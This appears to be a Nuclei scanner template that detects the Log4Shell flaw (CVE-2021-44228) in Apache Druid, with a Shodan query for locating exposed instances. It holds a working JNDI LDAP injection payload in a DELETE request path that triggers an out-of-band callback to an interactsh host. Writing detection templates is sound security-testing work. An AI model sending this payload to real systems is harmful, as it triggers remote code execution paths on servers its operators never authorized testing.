id: apache-druid-log4j

info:
  name: Apache Druid - Remote Code Execution (Apache Log4j)
  author: SleepingBag945
  severity: critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Apache Druid"
  tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast

http:
  - method: DELETE
    path:
      - "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 404

# digest: 4b0a00483046022100ec81c94944c5d2b6be56c59b5147c3be2208dc4d03838e99492656161a1eada60221008536772fbd67bdd760438837a8b4ec5d53bbb60f714eb3398ae6ff3f57b028f4:922c64590222798bb761d5b6d8e72950
